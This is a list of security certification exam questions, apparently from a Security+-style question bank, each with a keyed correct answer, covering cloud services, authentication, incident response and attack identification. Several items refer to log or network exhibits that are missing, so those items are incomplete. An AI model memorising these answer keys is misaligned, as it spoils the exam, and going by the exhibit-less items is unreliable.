Which of the following best describes the risk that is present once mitigations are applied?
A. Control risk
B. Residual risk
C. Inherent risk
D. Risk awareness
Correct Answer: B

Question #694
A security architect at a large, multinational organization is concerned about the complexities and overhead of managing multiple encryption keys
securely in a multicloud provider environment. The security architect is looking for a solution with reduced latency to allow the incorporation of
the organization’s existing keys and to maintain consistent, centralized control and management regardless of the data location. Which of the
following would best meet the architect's objectives?
A. Trusted Platform Module
B. IaaS
C. HSMaaS
D. PaaS
Correct Answer: C

Question #695
Which of the following best represents an application that does not have an on-premises requirement and is accessible from anywhere?
A. PaaS
B. Hybrid cloud
C. Private cloud
D. IaaS
E. SaaS
Correct Answer: E

Question #696
During an investigation, events from two affected servers in the same subnetwork occurred at the same time:
Server 1: 192.168.10.1 [01/Apr/2021:06:00:00 PST] SAN access denied for user 'admin'
Server 2: 192.168.10.6 [01/Apr/2021:06:01:01 CST] SAN access successful for user 'admin'
Which of the following should be consistently configured to prevent the issue seen in the logs?
A. Geolocation
B. TOTP
C. NTP
D. MFA
Correct Answer: C

Question #697
The most recent vulnerability scan flagged the domain controller with a critical vulnerability. The systems administrator researched the
vulnerability and discovered the domain controller does not run the associated application with the vulnerability. Which of the following steps
should the administrator take next?
A. Ensure the scan engine is configured correctly.
B. Apply a patch to the domain controller.
C. Research the CVE.
D. Document this as a false positive.
Correct Answer: D

Question #698
A company has decided to move its operations to the cloud. It wants to utilize technology that will prevent users from downloading company
applications for personal use, restrict data that is uploaded, and have visibility into which applications are being used across the company. Which
of the following solutions will best meet these requirements?
A. An NGFW
B. A CASB
C. Application whitelisting
D. An NG-SWG
Correct Answer: B

Question #699
An internet company has created a new collaboration application. To expand the user base, the company wants to implement an option that
allows users to log in to the application with the credentials of other popular websites. Which of the following should the company implement?
A. SSO
B. CHAP
C. 802.1x
D. OpenID
Correct Answer: D

Question #700
Following a prolonged data center outage that affected web-based sales, a company has decided to move its operations to a private cloud
solution. The security team has received the following requirements:
• There must be visibility into how teams are using cloud-based services.
• The company must be able to identify when data related to payment cards is being sent to the cloud.
• Data must be available regardless of the end user's geographic location.
• Administrators need a single pane-of-glass view into traffic and trends.
Which of the following should the security analyst recommend?
A. Create firewall rules to restrict traffic to other cloud service providers.
B. Install a DLP solution to monitor data in transit.
C. Implement a CASB solution.
D. Configure a web-based content filter.
Correct Answer: C

Question #701
A recent malware outbreak across a subnet included successful rootkit installations on many PCs, ensuring persistence by rendering remediation
efforts ineffective. Which of the following would best detect the presence of a rootkit in the future?
A. FDE
B. NIDS
C. EDR
D. DLP
Correct Answer: C

Question #702
An organization is building a single virtual environment that will host customer applications and data that require availability at all times. The data
center that is hosting the environment will provide generator power and ISP services. Which of the following is the best solution to support the
organization's requirement?
A. NIC teaming
B. Cloud backups
C. A load balancer appliance
D. UPS
Correct Answer: D

Question #703
A new company wants to avoid channel interference when building a WLAN. The company needs to know the radio frequency behavior, identify
dead zones, and determine the best place for access points. Which of the following should be done first?
A. Configure heat maps.
B. Utilize captive portals.
C. Conduct a site survey.
D. Install Wi-Fi analyzers.
Correct Answer: C

Question #704
The following IP information was provided to internal auditors to help assess organizational security:
Which of the following tools would most likely be used to perform network reconnaissance and help understand what is accessible to all users?
(Choose two.)
A. ipconfig
B. ping
C. chmod
D. netstat
E. traceroute
F. route
Correct Answer: DE

Question #705
A software company adopted the following processes before releasing software to production:
• Peer review
• Static code scanning
• Signing
A considerable number of vulnerabilities are still being detected when code is executed on production. Which of the following security tools can
improve vulnerability detection on this environment?
A. File integrity monitoring for the source code
B. Dynamic code analysis tool
C. Encrypted code repository
D. Endpoint detection and response solution
Correct Answer: B

Question #706
A security analyst needs to harden access to a network. One of the requirements is to authenticate users with smart cards. Which of the following
should the analyst enable to best meet this requirement?
A. CHAP
B. PEAP
C. MS-CHAPv2
D. EAP-TLS
Correct Answer: D

Question #707
A penetration-testing firm is working with a local community bank to create a proposal that best fits the needs of the bank. The bank's information
security manager would like the penetration test to resemble a real attack scenario, but it cannot afford the hours required by the penetration-
testing firm. Which of the following would best address the bank's desired scenario and budget?
A. Engage the penetration-testing firm's rea-team services to fully mimic possible attackers.
B. Give the penetration tester data diagrams of core banking applications in a known-environment test.
C. Limit the scope of the penetration test to only the system that is used for teller workstations.
D. Provide limited networking details in a partially known-environment test to reduce reconnaissance efforts.
Correct Answer: D

Question #708
A security analyst is reviewing SIEM logs during an ongoing attack and notices the following:
Which of the following best describes the type of attack?
A. SQLi
B. CSRF
C. API attacks
D. Directory traversal
Correct Answer: D

Question #709
A certificate vendor notified a company that recently invalidated certificates may need to be updated. Which of the following mechanisms should
a security administrator use to determine whether the certificates installed on the company's machines need to be updated?
A. SCEP
B. OCSP
C. CSR
D. CRL
Correct Answer: B

Question #710
A recent vulnerability scan revealed multiple servers have non-standard ports open for applications that are no longer in use. The security team is
working to ensure all devices are patched and hardened. Which of the following would the security team perform to ensure the task is completed
with minimal impact to production?
A. Enable HIDS on all servers and endpoints.
B. Disable unnecessary services.
C. Configure the deny list appropriately on the NGFW.
D. Ensure the antivirus is up to date.
Correct Answer: B

Question #711
An employee fell for a phishing scam, which allowed an attacker to gain access to a company PC. The attacker scraped the PC's memory to find
other credentials. Without cracking these credentials, the attacker used them to move laterally through the corporate network. Which of the
following describes this type of attack?
A. Privilege escalation
B. Buffer overflow
C. SQL injection
D. Pass-the-hash
Correct Answer: D

Question #712
Which of the following is a common source of unintentional corporate credential leakage in cloud environments?
A. Code repositories
B. Dark web
C. Threat feeds
D. State actors
E. Vulnerability databases
Correct Answer: A

Question #713
A company is designing the layout of a new data center so it will have an optimal environmental temperature. Which of the following must be
included? (Choose two.)
A. An air gap
B. A cold aisle
C. Removable doors
D. A hot aisle
E. An IoT thermostat
F. A humidity monitor
Correct Answer: BD

Question #714
A privileged user at a company stole several proprietary documents from a server. The user also went into the log files and deleted all records of
the incident. The systems administrator has just informed investigators that other log files are available for review. Which of the following did the
administrator most likely configure that will assist the investigators?
A. Memory dumps
B. The syslog server
C. The application logs
D. The log retention policy
Correct Answer: B

Question #715
Local guidelines require that all information systems meet a minimum security baseline to be compliant. Which of the following can security
administrators use to assess their system configurations against the baseline?
A. SOAR playbook
B. Security control matrix
C. Risk management framework
D. Benchmarks
Correct Answer: D

Question #716
A company's public-facing website, https://www.organization.com, has an IP address of 166.18.75.6. However, over the past hour the SOC has
received reports of the site's homepage displaying incorrect information. A quick nslookup search shows https://www.organization.com is
pointing to 151.191.122.115. Which of the following is occurring?
A. DoS attack
B. ARP poisoning
C. DNS spoofing
D. NXDOMAIN attack
Correct Answer: C

Question #717
An employee receives an email stating the employee won the lottery. The email includes a link that requests a name, mobile phone number,
address, and date of birth be provided to confirm employee's identity before sending the prize. Which of the following best describes this type of
email?
A. Spear phishing
B. Whaling
C. Phishing
D. Vishing
Correct Answer: C

Question #718
A company currently uses passwords for logging in to company-owned devices and wants to add a second authentication factor. Per corporate
policy, users are not allowed to have smartphones at their desks. Which of the following would meet these requirements?
A. Smart card
B. PIN code
C. Knowledge-based question
D. Secret key
Correct Answer: A

Question #719
The Chief Technology Officer of a local college would like visitors to utilize the school's Wi-Fi but must be able to associate potential malicious
activity to a specific person. Which of the following would best allow this objective to be met?
A. Requiring all new. on-site visitors to configure their devices to use WPS
B. Implementing a new SSID for every event hosted by the college that has visitors
C. Creating a unique PSK for every visitor when they arrive at the reception area
D. Deploying a captive portal to capture visitors’ MAC addresses and names
Correct Answer: D

Question #720
Which of the following is most likely associated with introducing vulnerabilities on a corporate network by the deployment of unapproved
software?
A. Hacktivists
B. Script kiddies
C. Competitors
D. Shadow IT
Correct Answer: D

Question #721
A cybersecurity incident response team at a large company receives notification that malware is present on several corporate desktops. No known
indicators of compromise have been found on the network. Which of the following should the team do first to secure the environment?
A. Contain the impacted hosts.
B. Add the malware to the application blocklist.
C. Segment the core database server.
D. Implement firewall rules to block outbound beaconing.
Correct Answer: A

Question #722
An administrator receives the following network requirements for a data integration with a third-party vendor:
Which of the following is the most appropriate response for the administrator to send?
A. FTP is an insecure protocol and should not be used.
B. Port 8080 is a non-standard port and should be blocked.
C. SSH protocol version 1 is obsolete and should not be used.
D. Certificate stapling on port 443 is a security risk that should be mitigated.
Correct Answer: A

Question #723
A security administrator manages five on-site APs. Each AP uses different channels on a 5GHz network. The administrator notices that another
access point with the same corporate SSID on an overlapping channel was created. Which of the following attacks most likely occurred?
A. Jamming
B. NFC attacks
C. Disassociation
D. Bluesnarfing
E. Evil twin
Correct Answer: E

Question #724
A security team has been alerted to a flood of incoming emails that have various subject lines and are addressed to multiple email inboxes. Each
email contains a URL shortener link that is redirecting to a dead domain. Which of the following is the best step for the security team to take?
A. Create a blocklist for all subject lines.
B. Send the dead domain to a DNS sinkhole.
C. Quarantine all emails received and notify all employees.
D. Block the URL shortener domain in the web proxy.
Correct Answer: B

Question #727
A data administrator is configuring authentication for a SaaS application and would like to reduce the number of credentials employees need to
maintain. The company prefers to use domain credentials to access new SaaS applications. Which of the following methods would allow this
functionality?
A. SSO
B. LEAP
C. MFA
D. PEAP
Correct Answer: A

Question #728
Which of the following would be best suited for constantly changing environments?
A. RTOS
B. Containers
C. Embedded systems
D. SCADA
Correct Answer: B

Question #729
A newly identified network access vulnerability has been found in the OS of legacy IoT devices. Which of the following would best mitigate this
vulnerability quickly?
A. Insurance
B. Patching
C. Segmentation
D. Replacement
Correct Answer: C

Question #730
The local administrator account for a company’s VPN appliance was unexpectedly used to log in to the remote management interface. Which of
the following would have prevented this from happening?
A. Using least privilege
B. Changing the default password
C. Assigning individual user IDs
D. Implementing multifactor authentication
Correct Answer: B

Question #732
Which of the following describes the exploitation of an interactive process to gain access to restricted areas?
A. Persistence
B. Port scanning
C. Privilege escalation
D. Pharming
Correct Answer: C

Question #735
A security analyst is assessing several company firewalls. Which of the following tools would the analyst most likely use to generate custom
packets to use during the assessment?
A. hping
B. Wireshark
C. PowerShell
D. netstat
Correct Answer: A

Question #736
A local business was the source of multiple instances of credit card theft. Investigators found that most payments at this business were made at
self-service kiosks. Which of the following is the most likely cause of the exposed credit card Information?
A. Insider threat
B. RAT
C. Backdoor
D. Skimming
E. NFC attack
Correct Answer: D

Question #737
An employee recently resigned from a company. The employee was responsible for managing and supporting weekly batch jobs over the past five
years. A few weeks after the employee resigned, one of the batch jobs failed and caused a major disruption. Which of the following would work
best to prevent this type of incident from reoccurring?
A. Job rotation
B. Retention
C. Outsourcing
D. Separation of duties
Correct Answer: A

Question #738
Following a recent security breach, an analyst discovered that user permissions were added when joining another part of the organization but
were not removed from existing groups. Which of the following policies would help to correct these issues in the future?
A. Service accounts
B. Account audits
C. Password complexity
D. Lockout policy
Correct Answer: B

Question #739
Which of the following ensures an organization can continue to do business with minimal interruption in the event of a major disaster?
A. Business recovery plan
B. Incident response plan
C. Communication plan
D. Continuity of operations plan
Correct Answer: D

Question #740
In a rush to meet an end-of-year business goal, the IT department was told to implement a new business application. The security engineer
reviews the attributes of the application and decides the time needed to perform due diligence is insufficient from a cybersecurity perspective.
Which of the following BEST describes the security engineer's response?
A. Risk tolerance
B. Risk acceptance
C. Risk importance
D. Risk appetite
Correct Answer: B

Question #741
A security team created a document that details the order in which critical systems should be brought back online after a major outage. Which of
the following documents did the team create?
A. Communication plan
B. Incident response plan
C. Data retention policy
D. Disaster recovery plan
Correct Answer: D

Question #742
A company wants to reconfigure an existing wireless infrastructure. The company needs to ensure the projected WAP placement will provide
proper signal strength to all workstations. Which of the following should the company use to best fulfill the requirements?
A. Network diagram
B. WPS
C. 802.1X
D. Heat map
Correct Answer: D

Question #743
A company wants to pragmatically grant access to users who have the same job. Which of the following access controls should the company
most likely use?
A. Role-based
B. Need-to-know
C. Mandatory
D. Discretionary
Correct Answer: A

Question #744
A security engineer is working to address the growing risks that shadow IT services are introducing to the organization. The organization has
taken a cloud-first approach and does not have an on-premises IT infrastructure. Which of the following would best secure the organization?
A. Upgrading to a next-generation firewall
B. Deploying an appropriate in-line CASB solution
C. Conducting user training on software policies
D. Configuring double key encryption in SaaS platforms
Correct Answer: B

Question #745
An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has been given all the
developer’s documentation about the internal architecture. Which of the following best represents the type of testing that will occur?
A. Bug bounty
B. White-box
C. Black-box
D. Gray-box
Correct Answer: B

Question #746
Which of the following are the most likely vectors for the unauthorized or unintentional inclusion of vulnerable code in a software company’s final
software releases? (Choose two).
A. Certificate mismatch
B. Use of penetration-testing utilities
C. Weak passwords
D. Included third-party libraries
E. Vendors/supply chain
F. Outdated anti-malware software
Correct Answer: DE

Question #747
A hosting provider needs to prove that its security controls have been in place over the last six months and have sufficiently protected customer
data. Which of the following would provide the best proof that the hosting provider has met the requirements?
A. NIST CSF
B. SOC 2 Type 2 report
C. CIS Top 20 compliance reports
D. Vulnerability report
Correct Answer: B

Question #748
Which of the following are common VoIP-associated vulnerabilities? (Choose two).
A. SPIM
B. Vishing
C. VLAN hopping
D. Phishing
E. DHCP snooping
F. Tailgating
Correct Answer: AB

Question #749
A security administrator received an alert for a user account with the following log activity:
Which of the following best describes the trigger for the alert the administrator received?
A. Number of failed log-in attempts
B. Geolocation
C. Impossible travel time
D. Time-based log-in attempt
Correct Answer: C

Question #750
Which of the following is a reason why a forensic specialist would create a plan to preserve data after an incident and prioritize the sequence for
performing forensic analysis?
A. Order of volatility
B. Preservation of event logs
C. Chain of custody
D. Compliance with legal hold
Correct Answer: A

Question #751
In which of the following scenarios is tokenization the best privacy technique to use?
A. Providing pseudo-anonymization for social media user accounts
B. Serving as a second factor for authentication requests
C. Enabling established customers to safely store credit card information
D. Masking personal information inside databases by segmenting data
Correct Answer: C

Question #752
A new vulnerability enables a type of malware that allows the unauthorized movement of data from a system. Which of the following would detect
this behavior?
A. Implementing encryption
B. Monitoring outbound traffic
C. Using default settings
D. Closing all open ports
Correct Answer: B

Question #753
A systems administrator is auditing all company servers to ensure they meet the minimum security baseline. While auditing a Linux server, the
systems administrator observes the /etc/shadow file has permissions beyond the baseline recommendation. Which of the following commands
should the systems administrator use to resolve this issue?
A. chmod
B. grep
C. dd
D. passwd
Correct Answer: A

Question #754
A security team received the following requirements for a new BYOD program that will allow employees to use personal smartphones to access
business email:
• Sensitive customer data must be safeguarded.
• Documents from managed sources should not be opened in unmanaged destinations.
• Sharing of managed documents must be disabled.
• Employees should not be able to download emailed images to their devices.
• Personal photos and contact lists must be kept private.
• IT must be able to remove data from lost/stolen devices or when an employee no longer works for the company.
Which of the following are the best features to enable to meet these requirements? (Choose two.)
A. Remote wipe
B. VPN connection
C. Biometric authentication
D. Device location tracking
E. Geofencing
F. Application approve list
G. Containerization
Correct Answer: AG

